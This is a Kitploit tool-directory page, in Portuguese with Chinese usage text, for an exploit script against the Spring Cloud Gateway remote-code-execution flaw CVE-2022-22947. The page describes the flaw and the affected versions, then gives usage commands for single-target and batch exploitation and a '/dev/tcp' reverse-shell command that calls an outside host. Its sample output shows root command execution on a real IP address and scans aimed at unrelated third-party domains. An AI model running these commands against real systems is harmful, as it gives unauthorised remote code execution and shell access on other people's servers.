Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-22947_EXP — Um script que pode ser verificado individualmente ou em lote, e também pode ser usado para reverse shell. | Kitploit
Ferramentas/GitHubGitHub/anansec/cve-2022-22947_exp
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e Controle
GitHubanansec/cve-2022-22947_exp

CVE-2022-22947_EXP

Um script que pode ser verificado individualmente ou em lote, e também pode ser usado para reverse shell.

Ver Repositório
7136há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

1. Vulnerabilidade de execução remota de código no Spring Cloud Gateway

root@kitploit:~
Nível de gravidade: Alto

Status do POC/EXP: Público

ID CNVD: CNNVD-2022-16402

​ ID CVE: CVE-2022-22947

2. Escopo do impacto:

    • VMWare Spring Cloud GateWay 3.1.0
    • VMWare Spring Cloud GateWay >=3.0.0,<=3.0.6
    • VMWare Spring Cloud GateWay <3.0.0

3. Descrição da vulnerabilidade

O Spring Cloud Gateway apresenta uma vulnerabilidade de execução remota de código. Essa falha ocorre no endpoint Actuator de aplicações Spring Cloud Gateway, que fica vulnerável a ataques de injeção de código quando habilitado, exposto e inseguro. Um atacante pode explorar essa vulnerabilidade criando maliciosamente uma solicitação que permite a execução de código remoto arbitrário no host remoto.

4. Utilização do EXP CVE-2022-22947

(1) Características do script

Suporta verificação de um único alvo

  • Suporta verificação em lote de vulnerabilidades

  • Suporta reverse shell

  • (2) Parâmetros do script

    root@kitploit:~
    -h   查看帮助信息
    -u   指定url目标
    -c   指定需要执行的命令,默认执行id
    -f   指定目标url文件
    

    (3) Uso do script

    1. Verificação de um único alvo

    Método 1:

    root@kitploit:~
    E:\pocs>python cve-2022-22947.py
    
        验证单个目标:
                1、python cve-2022-22947.py  进入交互模式后,根据提示输入目标url和需要执行的命令,注意命令的正确性
                2、python cve-2022-22947.py  -u http://example.com -c whoami
            验证多个目标
                1、python cve-2022-22947.py -f url.txt ,将需要验证的目标全部放在url目录下
            反弹shell
                1、python cve-2022-22947.py  -u http://example.com -c "bash -i >& /dev/tcp/ip/port 0>&1"
                2、进入交互模式,输入目标和反弹shell的命令
    
    请输入一个目标url地址:http://123.58.236.76:8484
    请输入想要执行的命令,默认执行id:whoami
    [+]目标:http://123.58.236.76:8484 ,成功获取回显命令:['root\\n']
    

    Método 2:

    root@kitploit:~
    E:\learn\python\pocs\pocs>python cve-2022-22947.py -u http://123.58.236.76:8484 -c whoami
    
        验证单个目标:
                1、python cve-2022-22947.py  进入交互模式后,根据提示输入目标url和需要执行的命令,注意命令的正确性
                2、python cve-2022-22947.py  -u http://example.com -c whoami
            验证多个目标
                1、python cve-2022-22947.py -f url.txt ,将需要验证的目标全部放在url目录下
            反弹shell
                1、python cve-2022-22947.py  -u http://example.com -c "bash -i >& /dev/tcp/ip/port 0>&1"
                2、进入交互模式,输入目标和反弹shell的命令
    
    [+]目标:http://123.58.236.76:8484 ,成功获取回显命令:['root\\n']
    

    2. Verificação em lote

    root@kitploit:~
    E:\learn\python\pocs\pocs>python cve-2022-22947.py -f url.txt
    
        验证单个目标:
                1、python cve-2022-22947.py  进入交互模式后,根据提示输入目标url和需要执行的命令,注意命令的正确性
                2、python cve-2022-22947.py  -u http://example.com -c whoami
            验证多个目标
                1、python cve-2022-22947.py -f url.txt ,将需要验证的目标全部放在url目录下
            反弹shell
                1、python cve-2022-22947.py  -u http://example.com -c "bash -i >& /dev/tcp/ip/port 0>&1"
                2、进入交互模式,输入目标和反弹shell的命令
    
    [+]目标:http://123.58.236.76:8484 ,成功获取回显命令:['uid=0(root']
    [+]目标:http://123.58.236.76:8484 ,成功获取回显命令:['uid=0(root']
    [+]目标:http://123.58.236.76:8484 ,成功获取回显命令:['uid=0(root']
    [-]目标:http://www.baidu.com,漏洞验证失败,请手动验证!
    [-]目标:http://www.qq.com,漏洞验证失败,请手动验证!
    [+]目标:http://123.58.236.76:8484 ,成功获取回显命令:['uid=0(root']
    

    3. Reverse shell

    root@kitploit:~
    python cve-2022-22947.py -u http://123.58.236.76:8484 -c "bash -i >& /dev/tcp/xxx.xxx.xxx/65534 0>&1"
    

    image-20220519233354807

    image-20220519233429912

    Baixar ferramenta